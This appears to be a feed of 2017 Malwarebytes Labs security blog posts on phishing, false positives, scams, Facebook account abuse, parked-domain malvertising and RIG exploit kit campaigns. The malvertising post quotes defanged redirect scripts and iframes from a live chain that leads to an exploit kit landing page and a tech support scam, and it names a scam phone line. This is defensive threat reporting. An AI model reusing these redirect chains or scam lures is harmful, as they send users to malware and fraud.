Looking at the way things are panning out, we can be confident that HTTPS will be the norm in no time. However, this doesn’t mean that all sites using SSL certificates can and should be trusted.

Google intended to separate phishing sites from legitimate ones with the marking of insecure sites, as Help Net Security noted in an article. Unfortunately, the introduction of new browser versions capable of flagging sites also promptly introduced more phishing sites using HTTPS. We’ve been seeing examples of this in the wild, as well, the latest of which was an Apple phishing campaign.

Discerning phishing pages from the real ones has become more challenging than ever. This is why it’s important for users to familiarize themselves with other signs that they might be on a phishing page apart from the lack of SSL certificates. Fortunately, users don’t have to look far from the address bar when they want to double-check that they’re on the right page before entering their credentials or banking details. Keep in mind the following when scrutinizing URLs and other elements around it:

  • Look for letters in the URL that may have been made to look like another letter or number, or there may be additional letters or numbers in the URL. For example, may appear as—Catch that? The double ‘v’ together makes it look like the letter ‘w.’ This is an example of typosquatting. Here’s another example:—the ‘l’ in “example” is actually the number one.
  • Look for an Extended Validation Certificate (EV SSL). You know that a trusted website has this when you see a company name beside the URL, as you can see from the below UK Paypal address. Not all sites with SSL have this, unfortunately, but some of the trusted brands online already use EV SSL, such as Bank of America, eBay, Apple, and Microsoft.

Lastly, be aware that phishers may use a free SSL certificate in their campaign to make it appear legitimate. They may also hijack sites that already have SSL in place, adding more to the veil of legitimacy they want to attain.

Other related posts:


The Malwarebytes Labs

The post Google reminds website owners to move to HTTPS before October deadline appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Explained: False positives

Malware Bytes Security - Thu, 09/07/2017 - 11:00am
What are false positives?

False positive, which is sometimes written as f/p, is an expression commonly used in cybersecurity to denote that a file or setting has been flagged as malicious when it’s not.

In statistics, false positives are called Type I errors, because they check for a particular condition and wrongly give an affirmative (positive) decision. The opposite of this is false negative, or Type II error, which checks for a particular condition is not true when, in fact, it is. In this blog post, we will focus on false positives in cybersecurity, but note that false negatives in this field are commonly referred to as “misses.” So “misses” are malicious files or malicious behavior that the scanner or protection software did not detect.

Possible causes of false positives

The most common causes of false positives are:

  • Heuristics: decisions are made on minimal bits of information
  • Behavioral analysis: decisions are made based on behavior, and the legitimate file shows behavior that is usually considered malicious
  • Machine learning: sometimes we see the effects of “garbage in, garbage out,” or more politely put, “training did not take certain situations into account.”

Let’s give some examples of these causes.

An example rule for a heuristic detection could be this: if this file claims to be from Microsoft, but it is not signed with the Microsoft certificate, then we assume the file has malicious intentions. A false positive could occur in the rare case that Microsoft forgot to sign the file.

One detection vector in spotting the behavior of ransomware is if a program starts deleting shadow copies. Some ransomware families do this to ensure the victim has no backups. But you can imagine a cleanup utility that deletes old shadow copies, which could possibly be flagged as displaying malicious activity, right?

Machine learning is done by feeding the system vast amounts of training data. Mistakes or ambiguities in the training data can lead to errors in the detections.

Designing detection rules for yet-unknown malicious files or behavior is always a balance of trying to cover as many of them as possible without triggering any false positives and, understandably, this can go wrong sometimes.

Fun facts

A much less common cause for false detections is deliberate false positives. The most well-known false positive is the EICAR test file, a computer file that was developed by the European Institute for Computer Antivirus Research to verify the response of antivirus programs without having to use real malware. Note that Malwarebytes for Windows does not detect the EICAR file and Malwarebytes for Mac only detects it under exceptional circumstances. This is by design.

But history has also brought us deliberate false positives as a way to test if an anti-malware software is using detections made by their competitors.


False positives are alarms for non-specific files or behavior that is flagged as malicious, while in fact there were no bad intentions present. They are caused by rules that try to catch as many malicious events as possible, which sometimes fail by picking up something legitimate.


Pieter Arntz

The post Explained: False positives appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Nigerian scams without the Nigerians

Malware Bytes Security - Wed, 09/06/2017 - 7:00pm

Users in English speaking countries are quite familiar with the Nigerian scam: an important guy in Nigeria needs your help getting his money out of the country and if you assist with some transaction fees, a chunk of his fortune could be yours. But what about non-English speaking countries? What forms the baseline level of internet crap? Today we’re going to look at the Chinese version – the seminar scam.

Step 1: the pitch

This is actually more common via SMS, presumably due to limited mobile spam tools. The subject line will reference upcoming training for generic business skills like project management, book keeping, or HR.

项目领导力总结—8月23-24日学吧 《项目领导力》

This particular message we received is advertising a “project leadership” seminar.

These pitches vary in topic, generally staying around vague business topics and are so common that almost any Chinese internet user is likely to see one eventually. The provided mobile number doesn’t show any results besides more spam and the QQ isn’t registered to any notable groups. Generally, the accounts associated with these emails are used exclusively for the scam.

Step 2: the form

Naturally, we want to attend said seminar, so we sent a response asking how to register. Within a day, the scammer responded:

He’s referencing a file that has a detailed agenda, as well as registration info. He also wants our Weixin, so that we can “maintain a long-term relationship.”

The attached, clean file includes a “registration form” requiring the following:



  • Company name, address, and bank with account number
  • Attendee’s name, phone number, and email addresses.

This is the point where generic business spam begins to edge closer to malicious. Scammers will take the target’s money, and PII as well for use in further scams. Should a user actually fill this out, they will be signed up for every spammer’s list in perpetuity.

Step 3: the payment

Just in case we were wondering about receipts, the form lets us know that we can pick up our tickets the day of the “training,” and then provides a bank account that we can wire money directly to.

Given that we didn’t pay the guy and we did not go to Shanghai to check out the “venue”, there’s still a possibility that this may be legit. That said:

  • We responded from a free Chinese webmail, offering no company affiliation. This did not faze the scammer.
  • There are estimates that up to 40% of Chinese private educational institutions (training centers, job skills, etc.) are unlicensed and/or fraudulent
  • The price of this training is 1800 yuan, which makes up a significant portion of the average Chinese monthly wage of 2300 yuan.

The odds are fairly good that there either isn’t any training, or the venue specified actually hosts a pyramid scheme that will train members on how to recruit new marks. Much like a Nigerian scam, this form of advance fee fraud is very common and familiar. Its familiarity is actually a plus, as anyone who responds to such an obvious pitch more or less preselects themselves as a vulnerable and easily manipulated target. And similar to the 419 scam’s exploitation of underdeveloped financial institutions in Nigeria, the seminar scam exploits a void in regulation in the Chinese adult education market. Seminar scams are a great reminder that regardless of the language or culture used, scammers will exploit the same weaknesses online, wherever they are.


So how do you defend yourself against seminar scams? First, don’t respond to the email and definitely don’t disclose any personal information. But also ask yourself, “Have I heard of this institution? Does it have a local reputation?” As well as “What reputable organization advertises in this way?” Probably not too many. Stay safe: be vigilant.

The post Nigerian scams without the Nigerians appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Facebook worries: I didn’t post that

Malware Bytes Security - Wed, 09/06/2017 - 11:00am

It is my assumption that most Facebook users don’t look at their own profile often. With your own profile, I mean the timeline that shows up when you click your own name or avatar in the Facebook menu.

That’s because we think we know exactly what is posted there, so why bother to look at it? After all, isn’t that supposed to be all the stuff that we posted ourselves?

The feeling of disorientation you get when you find something you are sure you didn’t post will be even worse if you notice that supposed messages have been sent from your Facebook Messenger account that you know you never sent. All in all, there might be some discrepancies between what you did and what actually shows up and that’s what this blog post is all about.

How do posts end up on your timeline that you didn’t post?

There are three main reasons that might be of some concern:

  1. Someone or something else has access to your Facebook account
  2. A Facebook app has the authorization to post on your timeline
  3. An active script or browser extension can post on your behalf

In all these cases, there is no immediate reason to worry as long as you know about it and trust the person, app, script, or extension that has access or authorization.

Authorized apps

We have seen it the past and I bet there are still active apps being spread among Facebook users by pretending to be spectacular videos. You may remember the “Man found inside Shark” and similar sensational posts, which try to trick you into downloading malware or installing a malicious app.

To check whether an app has the ability to post on your timeline, click on Settings:

On the left-hand side, click on Apps and select any app that doesn’t look familiar or trustworthy. You can see whether they can post on your timeline by looking at their permissions. If they have the authorization to post on your timeline, it will look like this:

Delete apps you don’t trust or no longer use by clicking on the X that shows up when you hover over an app with your mouse pointer in the Apps menu.

Scripts posting on your behalf

It is possible there is an active script (or program) that uses your credentials when you have Facebook opened in your browser. The script does not need to log in, but simply makes use of the fact that you already did log in. It doesn’t matter whether you did that actively or whether you relied on a cookie set in an earlier session.

These scripts can be hiding in your browser cache or in the shortcut that you use to open Facebook. You can find localized and browser-specific help on clearing your cache on this Facebook Help page for several browsers. You can circumvent using your shortcuts if you suspect they have been altered by typing in your browsers address bar. Once you are sure the shortcuts have been altered, you can find methods on how to clean your browser shortcuts on our forums.

Browser extensions could be responsible for this similar behavior. They can be removed following these procedures:

  • Internet Explorer: Tools (gear icon) > Manage add-ons > Toolbars and Extensions > Select the one(s) you don’t trust one by one and click “Disable”
  • Firefox: Menu (horizontal stripes) > Add-ons > click on “Disable” behind the ones you don’t trust or don’t recall installing.
  • Chrome: Menu (3 dots) > More Tools > Extensions > Uncheck “Enabled” behind the ones you don’t trust or don’t recall installing.
  • Opera: click the Opera icon > Extensions > Extension Manager > click on Disable below the ones you don’t trust or don’t recall installing.
Stolen credentials

I’m posting about this as the last option for a reason as the advice that we will give you here does not only apply to the cases where you know that someone or something you didn’t authorize posted on your behalf. If you have experienced or suspected that something or someone has been posting without your knowledge, or one of the other options (scripts, rogue apps), we recommend that you change your password and enable 2FA, if you haven’t already. Even if you have no idea who might have been responsible, we recommend you lock them out before they abuse their access to your account even further. We also recommend doing this even if you found out which app or other method was used, and even if you successfully removed the culprit, keep in mind that the same app or script might have harvested your login credentials and sent them to the threat actors.


What to do when you find posts in your name on Facebook which you did not post:

  1. Try to find out if there is a suspicious or unsolicited Facebook app active on your list that has posting authorization.
  2. Clear the cache of the browser that you use to access Facebook and the shortcuts you use to open Facebook.
  3. Change your password and consider enabling 2FA.


Other articles that might interest you:


Pieter Arntz

The post Facebook worries: I didn’t post that appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Expired domain names and malvertising

Malware Bytes Security - Tue, 09/05/2017 - 11:00am

In Q1 and Q2 of 2017, we noticed a sharp decline in drive-by downloads coming from compromised websites. The campaigns of the past are either gone (Pseudo Darkleech) or have changed focus (EITest using social engineering techniques).

Malvertising – which has remained steady and is currently the main driving force behind some of the most common malware and scam distribution operations- not only stems from various publishers but also from ‘abandoned’ websites. Those related domains once served a legitimate purpose but were never renewed by their owners and fell into the hands of actors looking to make a quick profit using questionable practices.

In this post, we take a look at how malicious redirections from expired domains work and what kind of traffic they lead to.

The life, death, and resurrection of a domain name

Most issues when it comes to web security don’t usually come from the platforms themselves but from the people that run them or from properties that have simply been relinquished. The folks over at Sucuri have written about this extensively and in a recent post, they showed how expired domains and outdated plugins in popular CMS were a deadly mix, resulting in malicious redirects.

Here is an example of a website, oezelotel[.]com first registered to on 03/10/2014, that once was advertising various hotels, was wiped in 2016, and eventually got parked as its domain name registration was never renewed.

Figure 1: Evolution of a website over time and its eventual expired domain name

New owner, clear motive

A historical whois on the parked domain courtesy of Hyas’ Comox shows that on June 4, 2017, the domain name changed hands from its original owner to This is also when the site changed hosting (moving from a Germany based server to a US one) and began exhibiting its malicious behavior.

A cursory review of some other properties owned by the same registrant indicates a penchant for going after expired domains and monetizing them via dubious ad networks. DomainTools has over 23 K records belonging to that same email address.

Malvertising roulette

You might think a non-existent site is harmless but this couldn’t be further from the truth. Abandoned or forgotten domains are often registered and ‘parked’ to generate low-quality traffic (i.e. spammy links) as described in yet another blog post from Sucuri, and it is a real – lucrative – business model.

We observed different types of traffic, ranging from bogus surveys to more nefarious activity such as drive-by attacks and tech support scams, based on a visitor’s user agent. Note that the following examples did not require users to click on any link, the simple fact of visiting the site triggered an automatic redirection.

RIG EK Flow:

Figure 2: RIG exploit kit infection chain via the Fobos campaign that delivers the Bunitu Trojan.

oezelotel[.]com (parked site) -> xml1.limeclick[.]com <html><head><title>Loading</title></head> <body><script>location.href='http://xml1.limeclick[.]com /click?i=SXRzS*SmiP4_0';</script></body></html> xml1.limeclick[.]com -> bingfreegames3[.]info <iframe frameborder='0' id='291733' src='http://212kjhguihkhbvd[.]cf/ ssl/index.php?ps=49506017476' width='313' height='313' dir='0' ></iframe> 212kjhguihkhbvd[.]cf -> (RIG EK landing) <iframe id="91130118" width=278 double="1" height=278 src= "http://188.225.27[.]234/?NTkwNTc2&mano={redacted}" > </iframe> Tech Support Scam (TSS) flow:

Figure 3: Redirection to tech support scam via blobar[.org]

oezelotel[.]com (parked site) -> bougainvillaeabuffeting[.]com <html><head><title>Loading</title></head> <body><script>location.href='http://bougainvillaeabuffeting[.]com/d/ r5t9b73131?rtb={redacted}&';</script></body></html> bougainvillaeabuffeting[.]com -> blobar[.]org document.write('<META http-equiv="refresh" content="0;url='+u+'">'); </SCRIPT><NOSCRIPT><META http-equiv="refresh" content="0;url={redacted}&"></NOSCRIPT> <META name="referrer" content="no-referrer"> blobar[.]org -> www.alrtsyscalling[.]cf (TSS landing) Location: https://www.alrtsyscalling[.]cf/call-microsoft-support-at-1-855-633-1666

Figure 4: Browser locker serving a tech support scam page (IP address is hard coded in picture)

Traffic and user targeting

These days it seems irrelevant how malicious actors get their leads, so long as they are genuine users they can expose to malware or scams. An advantage of using ad networks and malvertising is that a lot of the filtering can be handled throughout the distribution chain, with remarkable efficiency, compared to server side checks on compromised sites.

Parked domains are one of many scenarios of hijacking traffic and monetizing it. While those practices raise eyebrows, are they actually illegal? Is it something that domain name registrars should enforce or ban? Those are interesting questions worth debating.

Malwarebytes blocks a lot of domains associated with malvertising as well as drive-by download attempts. Because we are witnessing more and more social engineering attacks, we highly recommend you spread the word about one of the most common scams today, the tech support scam.

The post Expired domain names and malvertising appeared first on Malwarebytes Labs.

Categories: Malware Bytes

A week in security (August 28 – September 3)

Malware Bytes Security - Mon, 09/04/2017 - 1:00pm

Last week, we looked at what actions Kronos can perform in the final installment of a 2-part post. We also dived into Locky, again, a ransomware that just made a comeback, and found that its latest variant (as of this writing) has anti-sandboxing capabilities. This means that once Locky has determined that it’s residing in a virtual machine, it will not perform to its full functionality.

Our researchers also talked about a new 419 spam, malware vaccination tricks, malvertising, and insider threats.

Lastly, Senior Security Researcher Jérôme Segura uncovered a new RIG exploit kit campaign that drops the PrincessLocker ransomware via drive-by download.

Mobile Menace Monday: Implications of Google Play Protect

Below are notable news stories and security-related happenings from last week:

Latest updates for Consumers
  • Scammers Already Taking Advantage Of Hurricane Harvey, Registering Domains. “The Better Business Bureau said it has already seen sketchy crowdfunding efforts and expects the coming months to see the usual flood of ‘storm chasers’ — ranging from legitimate contractors looking for business to scammers attempting to take advantage of those who’ve already been victimized by the storm. In addition, US-CERT is warning users “to remain vigilant for malicious cyber activity seeking to capitalize on interest in Hurricane Harvey.” (Source: Cyber in Sight)
  • IRS Warns of Emails Spreading Ransomware. “The Internal Revenue Service (IRS) is warning US citizens of a new phishing scheme that poses as official IRS communications in the hopes that victims access a link, download a file, and hopefully get infected with ransomware.” (Source: Bleeping Computer)
  • USB Malware Implicated in Fileless Attacks. “In early August we discussed a case where a backdoor was being installed filelessly onto a target system using a script that abused various legitimate functions. At the time, we did not know how the threat arrived onto the target machine. We speculated that it was either downloaded by users or dropped by other malware. We recently learned the exact arrival method of this backdoor. As it turned out, we were wrong: it was neither dropped nor downloaded. Instead, it arrived via USB flash disks.” (Source: Trend Micro’s TrendLabs Security Intelligence Blog)
  • FDA Approves Firmware Fix for St Jude Pacemakers. “Abbott-owned St Jude Medical was at the center of a legal storm last year after suing security firm MedSec and short seller Muddy Waters for publishing what it claimed to be false info about bugs in its equipment. It argued this strategy helped them make money off the stock market when shares in St Jude inevitably fell on the news. However, since then the firm has been forced to address some of the issues highlighted by MedSec by releasing security fixes for some products, as it did in January.” (Source: InfoSecurity Magazine)
  • Attackers Exploited Instagram API Bug To Access Users’ Contact Info. “Instagram has confirmed that ‘one or more individuals obtained unlawful access to a number of high-profile Instagram users’ contact information — specifically email address and phone number — by exploiting a bug in an Instagram API.’ Apparently, no account passwords were exposed.” (Source: Help Net Security)
  • Phishing Emails Undetected by 97 Percent of People. “Today, phishing emails are behind 97 percent of cyber attacks, yet recent research reveals 97 percent of people cannot identify those phishing scams, putting the companies they work for at risk. In fact, out of 5,000 emails, one of them is likely to be a phishing email that causes damage. Victims may not know they’ve become one for up to a year.” (Source: Inside Counsel)
  • New Authentication Methods Help Companies To Ditch Passwords. “Most people now recognize that passwords alone are flawed as a means of securing systems. The problem is that there are lots of options when it comes to finding a better way of doing things. Access control specialist SecureAuth is helping the move towards a passwordless world with the introduction of additional multi-factor authentication (MFA) methods, including Link-to-Accept via SMS or email, and YubiKey, the FIDO Universal Second-Factor (U2F) security key by Yubico.” (Source: Beta News)
Latest updates for Businesses
  • Strains Of Mutant Malware Increasingly Evading Anti-Virus To Rob Bank Accounts, Says Akouto. “An analysis of recent attacks finds a sharp increase in the use of new strains of malware capable of bypassing traditional anti-virus according to cybersecurity experts from Akouto. The majority of the analyzed attacks aimed to harvest confidential information and steal money through online banking fraud.” (Source: Payment Week)
  • Ransomware is Going More Corporate, Less Consumer. “Ransomware deployed as worms tends to hit companies far harder than consumers, given that malicious malware can shoot through corporate networks with great speed. Consumers, on the other hand, are usually not connected to a network. As a result, WannaCry and Petya helped push corporations to account for 42% of all ransomware incidents in the first half of the year, compared to 30% of ransomware incidents for all of last year and 29% in 2015, according to the report.” (Source: Dark Reading)
  • SMBs Beware! This Is How Automated Software Updates Spread Malware. “You’re surfing the web, and suddenly a pop-up appears asking you to update a piece of software on your computer. Today, we should all be canny enough to hesitate before clicking ‘install’. We know that there is a good chance that this is malware and that what we will be downloading could put the future of our business at risk. However, what happens when we’re not given a choice? Can we always trust the seemingly routine automatic updates our computers receive, even when their certificate seems to be OK? The answer is no.” (Source: Computing.Co.UK)
  • Hacking Retail Gift Cards Remains Scarily Easy. “After years of examining the retail gift card industry following that initial discovery, Caput plans to present his findings at the Toorcon hacker conference this weekend. They include all-too-simple tricks that hackers can use to determine gift card numbers and drain money from them, even before the legitimate holder of the card ever has a chance to use them. While some of those methods have been semi-public for years, and some retailers have fixed their security flaws, a disturbing fraction of targets remain wide open to gift card hacking schemes, Caput says. And as analysis of the recently defunct dark web marketplace AlphaBay shows, actual criminals have made prolific use of those schemes too.” (Source: Wired)
  • Payment security: What are the biggest challenges? “With cybercrime on the increase, payment card security is increasingly a focus for companies and consumers alike. The Payment Card Industry Data Security Standard (PCI DSS) is there to help businesses that take card payments protect their payment systems from breaches and theft of cardholder data. The findings from the Verizon 2017 Payment Security Report (2017 PSR) demonstrate a link between organizations being compliant with the standard, and their ability to defend themselves against cyberattacks.” (Source: Help Net Security)

Safe surfing, everyone!


The Malwarebytes Labs Team

The post A week in security (August 28 – September 3) appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Insider threats in your work inbox

Malware Bytes Security - Fri, 09/01/2017 - 12:52pm

Recently, our friends at Barracuda found a new phishing campaign that banks on the popularity of cloud services used in most businesses, such as Microsoft Office 365.

According to their blog post, this latest scheme takes advantage of the natural trust employees place on messages they receive from colleagues using the correct email address. Dear reader, this campaign is beyond impostor email or business email compromise (BEC). Barracuda is calling it the ‘new insider threat.’

BEC phishing campaigns usually originate outside the target organization. The threat actor creates an email address that may appear like the real thing, just like what we’ve seen here, and then uses it to convince someone in the organization to wire money their way. If a threat actor successfully infiltrates an organization’s email platform on the cloud, then the threat becomes something else. The threat actor has become an identity thief and an insider who is now the biggest threat to any organization. At that point, the possibilities of abuse are endless.

Businesses can combat this new attack by continuous education and awareness efforts. It also pays to add multifactor authentication for additional ways employees can verify their identities before being allowed to access their work emails.


The Malwarebytes Labs Team

The post Insider threats in your work inbox appeared first on Malwarebytes Labs.

Categories: Malware Bytes

RIG exploit kit distributes Princess Ransomware

Malware Bytes Security - Thu, 08/31/2017 - 4:04pm

We have identified a new drive-by download campaign that distributes the Princess Ransomware, leveraging compromised websites and the RIG exploit kit. This is somewhat of a change for those tracking malvertising campaigns and their payloads.

We had analyzed the Princess Ransomware last November and pointed out that despite similarities with Cerber’s onion page, the actual code was much different. A new payment page seemed to have been seen in underground forums and is now being used with attacks in the wild.

From hacked site to RIG EK

We are not so accustomed to witnessing compromised websites pushing exploit kits these days. Indeed, some campaigns have been replaced with tech support scams instead and overall most drive-by activity comes from legitimate publishers and malvertising.

Yet, here we observed an iframe injection which redirected from the hacked site to a temporary gate distinct from the well-known “Seamless gate” which has been dropping copious amounts of the Ramnit Trojan.

The ultimate call to the RIG exploit kit landing page is done via a standard 302 redirect leading to one of several Internet Explorer (CVE-2013-2551, CVE-2014-6332, CVE-2015-2419, CVE-2016-0189) or Flash Player (CVE-2015-8651) vulnerabilities.

Princess Ransomware

Once the exploitation phase is successful, RIG downloads and runs the Princess Ransomware. The infected user will notice that their files are encrypted and display a new extension. The ransom note is called _USE_TO_REPAIR_[a-zA-Z0-9].html where [a-zA-Z0-9] is an identifier.

The payment page can be accessed via several provided links including a ‘.onion‘ one. Attackers are asking for 0.0770 BTC, which is about $367 at the time of writing.

Down but still kicking

The exploit kit landscape is not what it was a year ago, but we may be remiss to disregard drive-by download attacks completely. Malvertising is still thriving and we are noticing increased activity and changes with existing threat actors and newcomers.

We will update this post with additional information about Princess Locker if there is anything noteworthy to add.

Indicators of compromise

RIG EK gate:

RIG EK IP address:

Princess Ransomware binary:


Princess Ransomware payment page:


The post RIG exploit kit distributes Princess Ransomware appeared first on Malwarebytes Labs.

Categories: Malware Bytes